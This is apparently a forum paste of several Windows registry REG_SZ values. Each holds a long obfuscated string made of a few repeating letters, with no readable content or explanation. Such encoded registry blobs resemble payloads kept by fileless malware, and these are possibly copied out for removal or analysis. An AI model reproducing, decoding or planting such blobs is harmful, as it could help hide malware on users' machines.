Code: 35 REG_SZ vvtovviuvviuvviyvviivvtsvviwvvtqiwvvtivviyvvtovvtivvtwvvitvvtwvvitvvtrvvtyvvtyvviivvitvvtyvviyvviuvvtqtuvvtyvvtyvvtuvvtwvvtovviuvviuvviuvvtuvvtqtivvtyvvtuvvtuvvtuvviivvirvvttvvtpvviwvviivvttvviyvvitvvtuvvtpvvtyvvirvvtuvvtsvvtivviwvvirvviuvvitvvttvviuvviivviuvvitvvtpvvtyvvtovvtovvtwvviwvvitvvtuvvtqtwvvtpvviyvvtqtwvvtqtovvtyvvirvvttvviivvttvviuvvitvvtsvvtovviyvvttvvttvviwvvirvvtivvirvvtovvtivviwvviyvvttvvtovvtqitvviivvtivvtpvvtsvvttvvtpvviwvvirvvtivvtivvtuvvtyvviyvvtqtwvvtrvvtqtsvvtyvvtrvvtpvvtivvirvvtuvvtovvtyvvtpvvtwvvtovvtpvvtuvvtuvvtuvvirvvtovvttvvtrvvtqiyvviwvvtqiyvvtsvvttvvttvvtovvtwvviuvvtpvvtivvtivviwvvtqtuvvtpvvttvvtsvviuvvtivvttvvtyvvtivvtuvvirvvtuvvtovviyvvitvvtovvtpvviivvtwvvtpvviyvvtovvtpvvtivviivviivviwvvtrvvtwvvtyvvtrvvtrvvtqiivviuvvtsvvtsvviwvvtwvvtqtwvviyvviivvtovvtrvvtwvvtqiivvtqtuvvitvvtovvtrvvtovviuvviivvtyvvttvvtsvvtsvvtqtyvviyvviivvtsvvtpvvirvviivvtovvtpvvtqtivvttvviyvvirvvtovviivvtpvvtivvtivvtyvviivvtsvviwvvtivvtwvvttvviivvitvvtsvviwvviwvvtpvvirvviuvviuvvtrvvitvvttvvtrvviuvvtyvvtsvvtpvvtivvtivvtwvviyvvtivviivvtovvtyvvtsvvtivviuvvtqttvvtuvvtsvvtqtpvvtpvviyvvtrvvtsvvtpvvtovviuvvtuvvtyvvtqiuvviivvtwvviuvviuvvitvvtpvvtuvviyvvtuvvtivvtpvvtqtivvtwvvtovviyvvtwvvtovvtpvviwvvtpvviuvviivvtpvviuvviyvvirvviuvvtuvviwvvtqtwvvtwvvtsvvtsvvtuvviyvvtivvtrvvtyvvtpvvtovvtrvvtivviivvtsvvtwvvttvvtyvviyvvtwvvtpvvirvvtovvitvvirvvtwvvtwvvtwvviwvviyvvtuvviivvtqtivvtrvvitvvttvviuvvtqtivviivvtqtqtsvviuvvtyvviuvvtwvviivviivviwvviwvvtwvvtpvvitvvtyvviuvviuvvtyvvtuvvtyvviuvvtuvviivviyvvtpvvtwvvtyvviyvviuvvtovvtsvvtuvvtpvvtsvvirvviyvviyvvirvvtyvvirvvtsvvtivviwvvirvvitvviuvvitvvitvvtovviyvvtyvvtuvvtsvvtivvtivvtrvviuvvtsvvtyvvtpvvtivvtuvvtrvvtsvvtpvviwvvtuvviivvitvvtpvvtwvviivvtsvvitvvttvvtrvvtpvviuvvtsvviivvtuvviuvvtqiwvvtovvtuvviwvvtwvvtpvvirvvtwvviyvvtrvvitvvtwvvtrvvtqttvvtivvtovvtsvvtrvvtsvviwvvtovviwvvtqtivviwvvtqtyvvtwvvttvvtrvvttvviwvvtwvvtuvvitvvtovvtqtqtpvvtivvtyvvttvviivvttvvtrvviwvviyvvtsvviuvvtrvvtivvtyvvtrvvirvvirvvtpvvtivviuvviivvtivvirvviivviwvvtqtqitvvtpvvtpvvirvvtqtsvvtuvviyvvtpvvtyvvtpvvtwvvirvvtqtqirvvtsvvirvvtwvvtwvvtuvvtovviwvviivvtuvvttvvttvvtsvvtyvviivvtivvirvviuvviyvviwvvtuvviwvviuvvtyvvttvvitvvtqtwvviivvitvviyvvtovvtivviwvvtsvvtivvtivvtivviuvvtrvviivvtqirvvtivvtyvviivvtqtrvvtuvviyvvtyvvitvvtrvvtrvvtsvvirvvtpvvtsvvtovvtpvvttvviuvvtrvvtivvttvvtwvviwvvirvvtsvvtsvvttvvtrvvtqtivvtyvvirvvtuvvtrvvtwvvtrvvtovviwvvttvviivvtpvviivviyvvtsvviwvvtpvviyvvttvviwvviyvvtqtyvvtyvviwvvitvvitvvtqtuvvtivviyvvtwvviivviyvvtrvvtwvvtrvvttvvtrvvitvvtpvviwvviuvvirvvtuvvtovvtqtrvvitvvtivvtsvviyvviuvviuvvtsvvttvvtrvviwvviivviwvviwvviivvitvviivvtsvvtrvvitvvtivviyvvtpvvtsvvttvvttvvirvviyvviivvirvviyvvtuvvtovvirvvtivvtyvvitvvtwvvttvvtsvviyvviwvvttvviyvvtpvviivviwvviivvtrvvtwvviwvviyvvtyvvttvvttvvtsvvtyvvtrvviivviivvtivviwvviivviwvvtivvirvviivviuvvitvviuvvtuvvirvviivvtivvtuvvtwvvtpvvttvvtsvvtsvviuvvttvvtwvvttvviuvvtrvvtuvvirvvttvvtyvvtuvvtrvvtsvviivvttvvtsvvtpvvtwvvtwvviwvvtqtrvviivvtpvvtivvtrvvtwvvtivvtpvvttvvtovvtsvvtsvvtyvvtyvvtwvvtsvviyvvtsvvtivvtpvvtqtpvviyvvirvvtovvtuvvtrvvttvvtwvvtivvitvviivvirvvirvvtyvviivviivvtsvvtqtovvtrvviwvviivvttvvtivviivvttvvtrvviuvvttvvtivviwvviyvviyvvtqtsvvtpvvtyvvtqiyvvtsvvirvvtpvviivvttvvtqiuvvtpvvtyvviivviyvvtuvvtpvviwvvtivvirvviuvvttvviwvvtivvtuvvttvvtrvvtrvvtqtpvvttvvtivvttvvtuvvtsvvttvvtyvvtqtpvvtpvvtpvvtsvviivvtovviivvtqtwvviivviyvvtuvviuvvtpvvtovvtqtrvvtyvvtivvtuvvtsvviivviuvvtrvviuvviyvviuvvtpvvtivviyvvtivvtyvvtwvviwvviyvviivvtovvtqtivviuvvtyvvtyvvtuvvtivvtivvttvvtovvtpvvtyvvtsvviivviyvvirvviuvviivvitvvtpvviwvviwvviuvvtivviuvviwvvtsvvitvvttvviwvvirvviyvvtrvvtivvtuvvttvvtpvvirvviwvvitvvtrvvtqttvviwvvtrvviwvvirvviyvvtpvvtyvvtwvvtyvvtwvvtivvtivvtpvvtovvtyvvttvvtpvvttvvtqtrvvirvviuvvtwvvtivvtsvviyvvtpvvtqtsvviyvvtsvviwvviwvviivvtsvviyvvtivvtovvtyvvttvvtivvtrvvtivviyvviuvvtuvvtwvvtpvviivvtuvvtwvvitvvtsvvtqiivviyvvtyvvtyvvtrvvtovvtsvviwvvtuvvirvviyvvtuvvtrvvtpvvtwvvtyvvtsvvtrvvtpvvtsvviivvtpvvtsvvtuvviyvvtrvviwvvitvvttvviyvvitvvtivvtwvviivvtivvtrvviuvviivvitvvtovvtqiivvtpvviwvviwvvtqiyvvtrvvtuvviwvviivvttvviyvvto |
Code: vtovvtyvvtovviwvvtivvttvvtovvttvvtrvviuvviuvvtuvvtpvvtivviyvvirvvtrvvtuvvtqiyvvtwvvttvviwvvtwvvtqtovvtivvtsvvtpvviwvviwvvtivviwvvirvviwvvtivvtpvvitvvtpvviyvviivvtuvviivviivviuvvtsvvitvvtwvvirvvtyvvirvvtyvvirvvttvvtwvvtyvvtivvttvvtqitvvtpvvtuvvtpvvtovviuvviivviuvvtovvtuvvitvvtqtovvttvvtsvviyvvtwvvtovvtivviivviivvtqitvviuvvtqtuvviuvvttvvirvviivvtqtrvviwvviuvvtuvvtovvtpvvtsvviwvvtyvvtrvvtwvvtpvvtpvviuvviivvitvviyvviivvtrvvtyvvttvviyvvirvvtovviyvviivvtyvvtpvvttvvtwvviwvviivvtwvviivvtuvviyvvirvvitvvtpvvitvvitvviwvvttvvitvviuvvtivvtwvvtpvvtivvitvvirvvitvvtsvvtpvvtsvvtsvvtwvviuvvirvvtivvttvvtpvvitvvitvvirvvtivvitvviwvviyvvtwvviwvviyvviyvviuvvtpvvtyvvtsvviyvvtwvvtqtwvvtivvtrvviuvvitvvtrvvttvvtyvviwvvtivvtpvvttvvtwvviivvtwvviuvvtyvvttvvtqirvviyvvtwvvtsvvtqtovviivviyvvirvvtwvvtrvvtivviuvvtuvviivvttvvtivviwvvtovviuvvtqtpvviuvvtpvvtpvvitvvtrvvtuvvttvvirvvitvvtrvvtwvvitvvtrvvtrvvtuvvitvvtqtuvvtsvvtpvviuvvtwvvtsvviuvviyvvtivviuvvtwvviyvvtrvvitvviwvviwvvtuvvtrvviyvvtrvvitvvtyvvitvvtovviwvvtpvvtsvvirvvtwvvttvvtpvvtivvtuvvtpvvitvvtyvvtrvvtqtuvviwvviyvvtuvviuvvtqiuvvtuvvtsvvtivvirvvtuvvtyvvtyvviivvttvvtivviivvtqtovviivvtyvviivvtpvvttvvtovviyvvtwvvtovvirvvitvvtrvvtivvtwvvitvvtsvvtqitvvtovvirvvitvvtovviuvviuvvitvvitvvtyvvitvvtovvtivvttvviivvtivvtuvvtuvvitvviuvvirvvtwvviyvvtwvvtqitvvirvviyvvtyvvttvvirvvtsvvtsvvtrvviuvvtivvtqirvviyvviwvvtpvvtyvvtivvirvvitvvtsvvtpvvirvvtrvvtpvvtwvvtwvviyvvtovvtwvvttvvtsvvtsvvttvvitvvtuvvtwvvtovviyvvtovviyvvirvvtrvvtpvvttvvtqtovvtuvvtivvtuvvtovvtuvvtivviwvvtyvvtqiwvvirvvtrvvirvvtqtivvirvviivvirvvtqiivvtovvtuvvtsvviyvvitvvttvvtsvviwvviivviyvvtuvvtuvviivvtrvvtuvvtyvviyvvtrvviyvvttvvtrvvtqtuvviuvviuvvirvviuvvtivvtpvvtpvvtuvvtwvvtqtuvvtsvvitvvirvviyvviivvtyvvtsvvtwvviuvvtyvvtqiyvviwvvtivvtivvtivvitvviyvvtsvvtovvtivvtrvvtpvvirvvtqtsvvtrvviyvviyvvttvvtovvttvvtwvvtuvviwvvtsvvttvviuvvtpvvtsvvttvviyvviuvvitvvtsvvtwvvtwvviuvviyvvtrvvirvvtovvirvvtuvviyvvtsvvtrvvtovvitvviwvvtivvtqitvvtpvvtyvvtpvvtwvvitvvtwvviivvtwvvtsvvirvvtuvvtovviwvvitvvirvvttvvtivvttvvitvvtivvtqiuvvtrvvtrvvtwvvtovvtqttvvtpvvtovvtovvtyvvttvvtwvvtovvttvvtrvvtuvvttvvtpvvtuvvtuvvirvviwvvtuvvirvvtpvvttvvttvvtrvviivvtqtuvvtsvvtivvitvvttvvtivvtqtuvvtpvviwvvtqirvvtwvvtyvvttvvtpvvirvvttvviivvtwvvtqtpvvitvvitvvirvvtrvvtqtwvvtwvvtyvvtivvttvvtovvtwvvtsvvtpvvtuvvitvvitvviyvvirvviwvvtivviivviuvvtuvvtrvviwvvtyvvtivvtpvvirvvtyvvirvvtpvvtsvvitvvtivvitvvttvvtqtivviwvviivvtivvtsvviivviyvvtqiyvvtyvvtovvirvviyvviwvvirvvtuvvtwvvitvvtpvvtrvvtovvitvvtpvvtsvviyvvtovvtovvtuvvtyvvtsvvttvvttvvirvvtpvviyvvtrvvtqiuvvttvvitvvtqtqtivviivviuvvtqtpvvtovvtuvvtwvviyvvtrvviyvvtyvvitvvtuvvtpvvtyvviivvtuvvirvvtpvvtwvvtsvvtqitvvtsvviivvirvviwvvtqttvvtovviyvvtwvviivvtwvvtivvtovvtuvvtqtrvviyvvtsvvtsvviivvitvvtwvvtqtrvviyvvtivvtivvttvviivvtivvtovviuvvtqtivvtivvtovvtuvvirvviwvviwvvtyvvtivvtuvvitvvtrvviuvvtpvvtyvviyvviwvvtpvvtivviwvvtrvvtovviyvvtovvtivvtqitvvtuvvtuvvtuvviwvviivvirvvtsvvtrvvirvvtivvtwvvtsvvitvvttvvtivvitvvtrvviuvvtpvviyvvtuvvtovvtsvviwvvtrvvtpvvtsvvttvviwvvtivvttvviwvvttvvtsvvtivvtyvvtwvvtuvvirvvtpvvirvviyvviyvvtqtsvvtwvvtovvtqirvvtpvvtqirvvtqiuvvitvvtyvvtqtovvtivviyvvtuvviyvvttvviivvtuvvtrvvtpvviwvvitvvtovvitvvtivv |
Code: 75 REG_SZ vvirvviivvtsvviyvvitvvirvvitvvtyvvirvviwvvirvvtqiivviyvvtpvvtqiivvtuvvirvvtyvvitvvitvviivvttvvtsvvtuvvtqttvviyvviuvvtuvvtqttvvtqitvvtqiyvvttvvtyvviwvviivvtuvvtsvviuvvtwvvitvvtrvviuvvtyvviwvvtyvvitvvtpvvtpvviwvvttvviivviwvvtwvvtyvvtovvirvviyvvitvvtrvvtsvvtuvvtsvvtuvvtuvviuvvirvvitvvirvvtwvviyvvitvvtsvvtwvviyvvtuvvirvvtqttvvtuvviuvvitvvtsvviwvviwvviwvvtivviuvvitvvtrvvtivvtpvvirvviyvvtqtqiwvvitvvtqtuvviwvvtqtwvvirvviuvviwvvtwvviyvvtovvtpvvtsvviyvvtovvitvvtpvvtrvviwvvtrvvtuvviivvtyvvtpvviivvtuvvtrvvtuvvtwvvtpvvtuvvirvviwvvtrvvtrvvttvvtqttvvttvvtwvvtyvvtyvvtsvvttvvtqtyvvtwvviivviyvvtwvviwvviwvviuvvttvvtrvvtwvvttvviwvviuvvirvvtwvviivvtyvviivvtqtivvtyvvtsvvirvvttvviyvvtsvvtyvvtrvvirvvtqtqtrvvtqtuvviuvvtqirvvitvvtsvvtuvvtovvtsvviivvtuvvtovvtqtivvtovvtwvvtuvvtuvvtivvtuvvtyvvtyvviyvvtovviivviivviyvvtwvviwvviuvvitvvtpvvtuvvtrvvttvvtyvvtwvvtwvviuvviwvvttvviwvvirvvtwvvtwvvtqtyvvtivviivvirvvitvviivvtyvviwvvtyvvtyvviwvvtqtqitvvtpvviwvvtivvtuvvitvvtqiuvvtwvvtovvtivvtsvvtwvvtyvvtrvvirvviivviivviyvvtuvviuvvtqiyvviyvviwvvtovviwvvitvvtyvviwvvtuvvirvviivviwvvtqitvvtyvvtivvtyvvtuvvtovviwvvtqiivvtuvviuvvitvvtyvvtsvvtovviwvvtrvvttvviyvvtsvvtpvvitvvtuvvtsvvtwvviwvviwvvtyvvtovvtwvvtrvvtwvvtyvviuvvtqtrvvtsvvtwvvtivvtpvviivvtovvtyvvtwvvtovvtsvvtrvvtuvviivvirvvttvvtivvtsvvtpvvtyvvtuvviyvvitvviuvvttvvirvvtrvvtivvtyvvtovvtyvvtyvvtivvtivvtpvvtrvvtivvitvvtsvvtpvvtuvviwvvtovviuvviwvvtpvvtsvvtpvvtrvvttvvirvvtuvviyvvtrvviwvvitvvtwvvirvvtuvvtuvvtyvvtovvttvviwvvtivvtpvvttvvtqtyvvtuvvtuvvirvvtyvvttvvtpvvtyvvitvvtuvvtrvvttvvtqiyvvtsvvitvvtwvvtivvtivviyvvtpvvirvvitvvtsvvitvviyvvtovvtpvvtivvtyvvtpvvtsvvtovvtpvvtyvvtuvvtovvtsvvtrvvttvvttvvttvvtsvvtqirvvitvvtivviivvtwvvtwvvitvvtuvvtrvvtyvvirvvtyvvtpvvtuvvtovvtrvvtivvitvvirvvtyvviwvviuvvtovvitvvtwvvtyvviwvvtuvviwvvtpvvtyvvirvvttvvtovvtyvvtrvvtyvvtpvvtwvvtwvvirvviuvvttvvitvvtpvvtpvvtqtsvvtsvvtyvvtyvvtqtwvvttvvirvvttvvtivvtwvviyvvtwvvtuvvitvviwvvitvvirvvtyvvtwvvttvvtqtyvvitvvtrvvtsvvtyvvirvvtovviwvviuvviuvvitvvtivvitvvtsvviivvtivvirvvtwvvitvvtyvvtsvvitvviivvirvvttvvirvvtovvtqtrvviivvirvvtwvvtrvviyvviwvvtqtrvvtuvvtuvvtivvtqiyvviwvviuvviivvtwvvtsvvtwvvitvvirvvtuvvtpvvtrvvtsvvtyvvtrvvtovvtivvtsvvtrvvirvvirvvttvvirvviivvttvviuvvirvvtrvviivvtqiyvvtuvviyvviwvvtrvvttvviyvvirvvtovvtivviuvvtsvvtrvvtpvvtivviwvviwvviivvirvvtovvirvvtrvviwvvtrvvtpvvtuvvtqirvvtsvvtovvttvvtrvvttvvtovviyvvtovvitvvtyvvtyvvtivvtuvvttvvtqtsvvtuvviuvviwvviwvviwvvitvvtsvvtqiyvvttvvtsvvtwvvirvvttvvtuvvtrvvtuvvtuvvtwvvtsvvirvvtwvviuvvtqtsvvirvviuvvtyvviivvtovviuvvtqttvvtivvtsvvirvvtuvvtrvvtwvvtyvvtivvtrvvtuvvtpvvtqtivvtyvvttvvtovvirvvtpvvtpvvtivviyvvtyvvtpvvtovviuvvtuvvtqiivvtpvvtrvvtyvvtuvvtqtsvvtwvvtivviivviivvtovviyvvtsvvitvvtivvitvvtsvvtyvviwvviivvttvvtyvvtuvvtwvvtyvvtuvvtpvvtwvvtwvvirvvtivvtuvvttvvtivvtyvvtqiuvvtsvvtsvvtivviivvtqtuvviyvviyvvtivvtuvvtsvvirvvtyvvtpvvirvvtqtwvvitvvitvvtyvvtivvtovvtsvvtuvvtyvvtwvviyvvtovvtqiivvtovvtyvvtyvviwvvtpvvtwvviuvvttvvirvvtpvvtwvvtyvvitvvtqtqiwvvtwvvirvvtivviuvvtivviivvtyvviwvvtrvvitvviwvvtovvtovviivvtrvviivvtrvvirvvtqiwvvtpvvtrvviyvvtyvviivvtrvvtyvviyvvtyvvttvvtpvviuvvtwvviuvvtpvviuvvtivvtwvvirvviwvvtuvvtivviivviyvvtsvvtivvtrvvtrvviuvvtqttvvtwvvtwvvtivvttvvirvvtyvvtwvvtovvtsvviyvvtqtpvvtwvvtqtivvtpvvirvvitvvtpvvtovvtwvvttvvitvvtpvvttvviyvviyvviuvvtivvtuvvtovvtivviwvvirvvitvvitvvtovviivvtyvvirvvitvviivvttvvitvvtsvvtivvtuvvtivvtuvvttvvtyvviuvviuvvtovvtqtrvvtrvvtwvvtsvvtivviivvtrvvtuvvitvvtovviivvtwvvirvvtivviivviuvviyvviivvttvvtrvvtpvvtpvvtpvvttvvtrvvtyvvtovvtwvvtwvvtovviivvirvviwvvtyvvtwvvirvviivvtivvtuvvirvvtuvvttvvirvvtsvvtuvvtovvtivvtqtpvvirvvtsvvtyvvtuvvtuvvirvvtpvvtpvvtivvtpvvtsvvtyvvitvviivviyvvitvviwvvirvvtwvvtrvvitvvtivviivvitvvtuvviwvvtqtpvvtrvvtovvtyvvtovviuvvtyvvtivvtrvviivvtovvtsvviuvvtuvvttvvttvvtpvviuvviivviivviivvttvvitvvirvviivvtyvvtuvvttvviuvvtovvirvvtwvvitvvttvviuvvtwvviyvvttvvtpvviwvvtwvvirvvirvvtrvvtyvvtpvvirvvtovvtyvvtovvtpvvtovvtrvvtsvvtivvirvvtsvvtovvitvvirvvtwvviwvvttvvttvviuvvtsvvtpvviuvviivvtrvvtuvvttvviyvvtsvviivviwvvtyvvitvvtwvvitvvttvvtuvviwvvirvvtsvvtuvvtpvvtyvvirvviyvviyvvttvvtsvvtpvvttvvty |
Code: 100 REG_SZ vviivvttvvirvvtivvtwvvtrvvtpvvtpvvitvvtivvtuvvtovvttvviivviuvvirvviyvvtivvttvvtivvtwvvtuvvtwvvtuvviyvvttvviivvtyvvtovvtsvvtyvviivviyvvtovvirvvirvvtsvviivvtsvviuvvitvvtqiyvvtovvtpvvtwvviuvvtovvtrvviivviuvvttvvitvvtivvtwvvtuvviyvvtqtwvvtovvtyvviuvvtrvvtivvtrvvtwvvtrvvtuvviwvvirvvtovvtpvvtqiivvtivvtpvvtovvtivvitvvitvvtrvvtuvvtivvirvvtyvviuvvtpvvtpvvtwvvirvvtivvtivviivvtrvvtovvtovvtwvviivvtyvvtsvviwvviuvvtrvvtsvvtovvtpvvtovviwvvtpvviyvvtivviyvviivviivvtrvviuvviuvviyvvtivvtpvviivvtuvvtrvvirvvtovvttvvtwvvtwvvtivvttvviuvvirvviuvviuvvtpvviwvvtrvviwvvtrvvttvvtuvvttvvttvviwvviuvvtrvvirvvtwvvtpvvttvvtyvviyvvtqiuvvtivviivvtwvviwvvtsvvitvvtivvtsvvtivvtovvtwvvirvviuvvtovvtrvvtpvvtsvvtovvtqtivvtivvtrvvtivvitvvtrvvitvvtsvvirvvtqtqiwvvitvvtsvvtsvvtuvvttvvtuvvtpvvtwvvtivviwvvtsvviuvviuvvtuvvtqtovviivvtwvvtqiuvvirvviwvvtovvtpvvtsvvttvvttvviivvitvvirvvtwvvtrvvttvvirvvtovviuvvtuvvirvvtivvtyvvtsvvtqiuvviivvitvvitvvttvvtyvviwvvtyvviuvvtivvtwvvtuvvitvvtrvvtovvtsvvitvvtovviuvvtivvtsvvttvviwvvirvvttvvtpvvirvvtyvviyvvtwvvtrvvtpvvtovvtyvvtpvvirvvtuvviivvirvviuvvtovviyvvtwvvtwvviuvvtpvvttvvitvvtrvvtuvvtuvvtuvviivviuvvtivvtuvvtrvviwvvitvvtuvvtyvvtivvtwvvttvviuvvtuvviivvtivvtqtrvviivviwvvttvvtuvvtuvviwvvttvvtyvvtivvtsvvtyvvtqtuvvtuvvtqiwvvtivviuvviwvvtrvvtivvttvvtivviwvvtuvvtsvviuvvtsvvtwvvtrvvtrvvtwvvtpvvirvvtovvttvvirvviivvtwvvttvviwvvtovvirvvtivvttvvitvviuvvtuvvtivvtwvvtivvttvvitvvtpvvtyvviivviivvirvvirvviwvviyvvtqtyvviuvvtovvtrvvtovvirvviivvtyvvttvvtqtqirvvirvvtrvvtqiwvvitvviyvviyvvtsvvttvvtrvvttvvtuvvtsvvtsvvtivviyvvtsvvtuvvtwvviivviyvviwvvtovvtsvvtpvvtpvvtqtyvviivviivvtovvtqtrvvtqtsvvitvvtwvvtyvvtpvvtyvvtovviivvtsvvitvvirvviyvvtqitvviuvvtwvvtovvtwvviivviwvviivviwvviwvviwvviivvtsvvtovvtwvvtivvttvvtpvvtovvttvvtrvvtqtivvtqiivvtsvvtqtsvvtpvvtyvvtovvtwvvtqirvviuvvtqtyvvtqtrvviivvtsvvtpvvtyvviuvvtqitvviyvviyvvtrvviyvvtwvvtivvtivvtyvviyvvtyvvirvviyvvtwvvtpvviyvviuvvtyvvtqtivviyvviwvviwvvtqiyvvtovviwvviivvtrvvirvvtsvvttvvtwvvtpvvttvviivvtyvvtuvvtovviwvvtqtsvviwvvtqtyvvtuvvttvviyvvtsvvtuvvtovvtivvtwvvtsvvtivvtqitvviivviwvvtyvvtovviyvvtpvviwvvtqtwvviwvvtwvvtrvvtivvtrvvtqiyvviuvvtrvvtovviwvviwvvtovvtovvtovviivvtsvvtqtivvttvvirvvtsvviyvvirvvtyvvttvvttvvtuvvitvvtsvvtivvtsvviwvviwvvtqtrvvitvvitvvirvvtpvvtwvviyvvtivviuvvtqiivvitvviwvvtsvviyvvtqiwvviwvvtovvtqiyvvttvvitvvtsvvitvviuvviwvviuvvtpvvtwvvttvvitvvitvvtyvvtuvvtovvtsvvtsvvtrvviivviuvvtwvvirvvtwvvtovvirvvtpvvtyvviuvviyvviivvirvvirvviyvvtqiyvvtivvtqtyvvttvvtsvviwvvtqtsvvtivvtivviwvvtsvviuvvtwvvtwvvtqtqiuvvtyvvtivvtqtuvvtsvvtuvvtpvviivvtpvviuvvtuvvtqttvvirvviuvvtuvviyvvitvviwvviivviyvvitvvtyvvirvvtuvvtsvviivvtpvvtivvirvvtqtqiyvviivvtuvviwvvtuvvttvvtpvvtpvvitvvtsvviuvviwvvtwvvirvvtqtqitvvtivviivvtpvviyvvtivvtqtivvitvvtovvtqtsvvitvvtrvvtwvvtwvvtwvvitvvirvvtovviuvvtqirvvtsvvtpvvtuvvtivvtovvtovvtpvvtovviyvviivvtovvtsvvtrvvirvviivvtwvvtsvvtsvvtuvvtpvviwvviivviyvviuvviyvvtqtpvviuvvtyvvtpvviuvvitvvttvvtrvvttvvtwvvitvviuvvitvviuvvitvvtpvvtpvvitvvtuvviyvviuvvtuvvtuvvtrvvitvvirvvtwvvttvvttvvttvviyvvtuvvttvviwvvtsvvtrvvtrvvirvvitvvtpvviyvvtivvtivvtqtpvvttvvtovviwvviivvtwvviivvtivvtovvtqtovviuvvttvvtyvvtrvvitvvtuvvtuvvtrvvtivvttvvtyvviuvvitvviyvvitvvtqtovvtuvvitvvtivvtwvvitvvtyvvtovvtuvvirvviivvtyvvtpvvtwvvtyvvttvvirvvtyvviwvviyvvtpvvtrvvtqiivvtuvviivvtyvviwvvtyvviwvvtqttvvtrvviyvvttvvtuvvtyvvtsvviwvvirvvtovvirvvtwvviyvviivvtovviivvtrvvttvvttvvtrvvitvvtivvtrvvirvvtrvvttvviwvviwvvtuvvtpvvttvvitvvtwvvtrvvtrvvtivviyvviuvvtivvtwvvtsvvtpvvtyvvtwvvtyvvtqitvvirvvtivviuvvtuvvtpvviivvtsvviyvviivvtovvtrvvtqtivvtivvtuvvtwvvttvviyvvtivviwvviivvtpvvtqtqtsvvtuvvirvviwvvtrvviivviuvvtsvviivvitvvtsvvtsvviyvvtrvvtwvvtwvvitvvtuvvtpvvtuvvtqirvvtuvvtuvvtuvvtsvvtovviwvvtsvvtyvviivvtsvviyvviuvviwvviivviuvvtrvviivvtwvvttvvtuvvirvvtivvitvvtivvtivviivvttvvtovvtsvvtpvvtovvtwvvtivvtwvvtyvviuvviuvvttvviuvvtivviivvtwvvtwvvtuvvtpvvitvvtpvvitvviivvtyvvtpvviwvvtpvvtuvvirvvtyvviwvvtyvvttvvtqtrvvttvvttvviuvvirvvtqiwvvtqtyvvtsvvitvviwvvtwvvtivviuvvtuvviwvvtivvtovvtsvvitvvtuvviyvvtovvtsvviwvvtpvvtpvvtsvvttvvirvvtqiyvvtsvvtpvvitvvtrvvtwvviwvvttvviwvvtivvtwvvitvv |
Code: 115 REG_SZ vviivvtrvvtrvviivvitvvtrvvtpvvtqtqtyvvtrvvtqtsvvtyvvtwvvirvviivvtrvvtuvvitvvtivviyvvtpvvtwvvtsvvtyvviyvvirvviuvviivviivvtrvvtrvvirvvtyvviuvvtsvvtsvvtovvtqtqtpvvttvvtwvvtqiuvvtyvviivviwvvttvvtuvviuvvitvvtivvtivviyvvtwvvtivvtrvviivvitvviuvviuvviyvvtrvvtuvvtrvvtuvvtuvviuvvtpvvtyvvtivviyvvttvvttvvirvviwvvitvvtyvvtpvviwvvtwvvtyvvtovviuvvtivvtpvvitvviyvvttvvtsvvtyvvtsvvtqirvvitvvirvvtsvvtrvviwvvtuvvtwvvtsvvtivvtqtsvviuvvtrvviwvvtrvvtovvtwvvttvvtuvviyvvtuvvtyvvtivviyvviyvviwvvirvviivvitvviwvvtovvtovvtsvviwvvtsvviyvvtqtivvirvvtovviyvviyvvtyvviivvtrvvtpvvtivvtovvtuvvtovvitvviivvtwvviyvvtqttvvtovvtovvtyvvttvvitvviivvtivvtsvvttvvitvvtivvtrvvtovviwvvtrvvtsvvtuvviwvviuvviyvvtqttvvtsvvirvvtuvvtivvtpvviivvttvvitvviyvvtqtyvvirvvtuvvtpvvtrvvtuvvtpvviwvvtwvvtyvvtwvvitvvitvvtwvvirvvitvvtuvvtpvvtrvvttvvtivvtsvvirvviyvviuvvtwvvtuvvttvvtyvvtqtpvvtwvvtsvvttvvtivviyvvtivvtsvviivviwvvirvvtqtpvvtpvviyvvtqtuvvtpvvttvvtqtqtovvirvvitvviwvviwvvtyvvtqttvvtovviivvttvvitvvtovvtsvvtsvvtyvviyvvtyvvtwvviyvviyvvtuvvttvvtrvvtsvviyvvtuvvtsvvtsvvtyvviwvviwvviyvvtwvvtqtivvitvvtsvvtrvviuvviwvvtovvtpvvtpvvtovvtuvviwvvtpvvtsvvttvvtovviyvvtqttvvirvvtqitvviuvvtuvvtivvtsvviuvvtpvviwvvirvviyvvtyvviuvvtqiwvviivvtrvviuvviyvviyvviivvtqttvviivvitvvttvviwvvtwvvtpvviyvviuvvtsvvtsvvitvvtivvtsvvitvvtsvviuvvirvvitvvtsvviivviyvvtwvvtwvviwvvirvvitvvtrvvttvvitvvirvvitvvtwvvirvviuvvtsvviwvvtwvvtuvvtivvtyvvtrvvitvvtpvvttvvtqtuvvitvvtivvtrvvttvvtsvvttvvtsvvtqtqiyvviuvvtuvviuvvtuvvirvvtyvvtyvvtwvvtpvvtwvvtsvviivvtwvviyvvttvvtuvvttvvtyvviuvvtsvvitvvitvvtsvvtuvvtyvvtsvvirvviwvvtwvvirvvirvvtovvtqtyvvtwvvtwvvttvvtrvvtsvvtrvvtwvvttvviwvvtqirvvtyvvttvvtovvtpvviwvvitvvtyvvtuvvirvvtrvvitvviwvvttvvtrvvtwvvttvvirvvttvvttvvtrvvtsvvirvviyvvtsvvtsvvtrvvtqtivviivvitvviivvtsvviuvvtwvvtpvvtrvviwvviuvvtwvvtyvvtpvviivvtovvtpvvirvviyvvtwvvtovvttvvirvvtqiivviyvvtivviuvvtpvvtrvvtwvvtivvtivviwvvitvvtrvvtqirvviyvviyvvirvvtovviwvvtovvtqiuvvtwvvtqtivvirvvtovvtsvvtovviwvvitvviivvtrvvirvvtrvvtrvvtivvtyvvitvviuvvtpvvtqtrvviivvtivvtsvvtrvvtrvvtpvvtuvvtwvviuvvtqtwvvtqtpvvitvvitvviivvtuvviyvvtyvviwvvtyvvtivvitvvtovviyvvitvvtsvvtpvvttvvtqtovvtwvvtwvvtyvvttvvirvvtsvvtwvvtuvvtuvviyvvirvviwvviuvvtivvtuvviivviyvvtsvviyvvitvvitvviuvviyvviivvtpvviwvvtsvviuvviyvvttvviuvvirvviyvvtyvvttvviivviwvvtqtqtrvviyvvirvvtqtqtivviuvviivvirvviyvvtqiuvvtwvvtuvvttvvtovvitvvtivvtrvvtuvvtyvvirvvtuvvirvvtwvvttvvtuvvtyvvtuvviwvvtsvvtovvirvvtsvvtrvviwvvttvvtqtovviwvvitvviwvviivvtwvvirvviyvvtrvvtsvvitvviyvvtivvtivvtyvvtrvvtivvirvvtovviuvviwvvtrvvtyvvtrvvtovvtsvvtuvvtsvvtqtovvtwvvtrvvtrvvtivviuvviuvvttvvitvviwvvtpvviivviyvviivvtrvviuvvtrvviwvvtu